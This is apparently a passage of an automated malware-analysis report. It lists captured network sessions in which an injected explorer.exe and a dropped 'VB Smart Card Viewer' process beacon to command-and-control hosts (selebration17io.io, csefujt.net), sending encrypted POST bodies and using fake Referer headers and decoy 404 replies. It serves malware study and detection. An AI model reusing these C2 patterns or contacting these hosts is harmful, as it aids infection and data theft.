                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                85192.168.2.64982791.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:20.995029926 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://whlyawtijntebx.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 305
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:20.995066881 CET305OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 fd af 3f ea
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO?~SSutuV>#!Q?c\vRy'TVwM(OD[LG/P=em~1zx1t@"Y'*7U0G/*t:co2qq
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:21.251159906 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:21 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                86192.168.2.649828185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:21.797250986 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:22.033667088 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:21 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                87192.168.2.649829185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:22.361737013 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:22.609204054 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:22 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                88192.168.2.649830185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:22.947249889 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:23.188909054 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:23 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                89192.168.2.649831185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:23.545528889 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:23.782243967 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:23 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                90192.168.2.649832185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:24.117058992 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:24.361047983 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:24 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                91192.168.2.649833185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:24.712949038 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:24.949419022 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:24 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                92192.168.2.649834185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:25.297821999 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:25.544548988 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:25 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                93192.168.2.64983591.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:25.698829889 CET288OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://cuhiokodwvirqcxc.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 236
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:25.698879004 CET236OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 99 f9 5b b9
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO[i}8K/tgN0Th!!="8@2[E7{#.~)R`4E.{6pup ]nF/i35tR:*0r?26.M9
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:25.954585075 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:25 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                94192.168.2.649836185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:25.886007071 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:26.127146959 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:26 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                95192.168.2.649837185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:26.483295918 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:26.720006943 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:26 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                96192.168.2.649838185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:27.054218054 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:27.298125982 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:27 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                97192.168.2.649839185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:27.844743967 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:28.081578970 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:27 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                98192.168.2.649840185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:28.459085941 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:28.702107906 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:28 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                99192.168.2.649841185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:29.167968988 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:29.412574053 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:29 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                100192.168.2.649842185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:29.766911983 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:30.003658056 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:29 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


